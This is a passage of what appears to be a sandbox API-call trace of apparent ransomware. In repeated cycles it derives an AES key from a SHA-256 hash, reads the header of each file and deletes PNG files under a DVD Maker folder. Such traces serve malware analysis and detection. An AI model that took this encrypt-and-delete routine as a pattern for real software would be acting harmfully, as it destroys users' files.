dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.470] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.470] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.470] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13e0 [0146.471] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.473] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.473] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.473] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.475] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationleft_buttongraphic.png")) returned 0 [0146.475] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.476] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.476] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.476] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.476] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc3a [0146.476] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.478] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.478] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.478] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.479] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationleft_selectionsubpicture.png")) returned 0 [0146.497] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.498] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.498] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.498] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.498] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13a1 [0146.498] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.501] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.501] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.501] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.502] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationright_buttongraphic.png")) returned 0 [0146.502] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.503] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.503] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.503] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.503] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc2e [0146.503] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.505] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.505] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.505] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.506] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationright_selectionsubpicture.png")) returned 0 [0146.507] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.507] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.507] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.507] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.507] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x135b [0146.507] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.514] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.514] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.514] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.515] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationup_buttongraphic.png")) returned 0 [0146.516] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.516] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.516] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.516] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.516] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc09 [0146.516] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.518] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.518] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.518] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.522] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationup_selectionsubpicture.png")) returned 0 [0146.522] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.523] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.523] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.523] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.523] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x17719 [0146.523] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.530] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.530] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.530] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.532] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\scenesscroll.png")) returned 0 [0146.532] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.533] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.533] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.533] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.533] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb30 [0146.533] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.535] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.535] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.535] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.536] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialmainsubpicture.png")) returned 0 [0146.537] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.537] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.537] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.537] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.537] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x12cf [0146.537] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.540] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.540] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.540] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.542] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationleft_buttongraphic.png")) returned 0 [0146.542] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.543] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.543] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.543] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.543] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbd6 [0146.543] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.545] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.545] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.545] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.546] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationleft_selectionsubpicture.png")) returned 0 [0146.547] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.547] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.547] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.547] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.547] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x12cf [0146.547] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.550] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.550] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.550] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.552] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationright_buttongraphic.png")) returned 0 [0146.552] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.552] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.552] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.552] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.552] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbd0 [0146.552] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.555] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.555] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.555] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.556] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationright_selectionsubpicture.png")) returned 0 [0146.578] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.578] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.578] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.578] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.578] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1302 [0146.578] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.581] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.581] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.581] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.582] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationup_buttongraphic.png")) returned 0 [0146.583] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.584] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.584] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.584] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.584] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbc3 [0146.584] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.586] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.586] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.586] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.587] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationup_selectionsubpicture.png")) returned 0 [0146.588] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.588] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.588] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.588] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.588] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4aa8 [0146.588] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.591] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.591] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.591] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.596] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialoccasion.png")) returned 0 [0146.596] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.596] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.597] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.597] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.597] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1917 [0146.597] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.599] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.599] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.599] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.601] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\whitemask1047.png")) returned 0 [0146.601] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.601] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.601] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.601] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.601] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x296fa [0146.601] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.612] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.612] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.612] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.613] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\whitevignette1047.png")) returned 0 [0146.617] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0146.617] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.618] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.618] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.618] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.618] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb5e [0146.618] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.620] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.620] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.620] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.621] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\circlesubpicture.png")) returned 0 [0146.622] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.622] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.622] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.622] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.622] GetFileSize 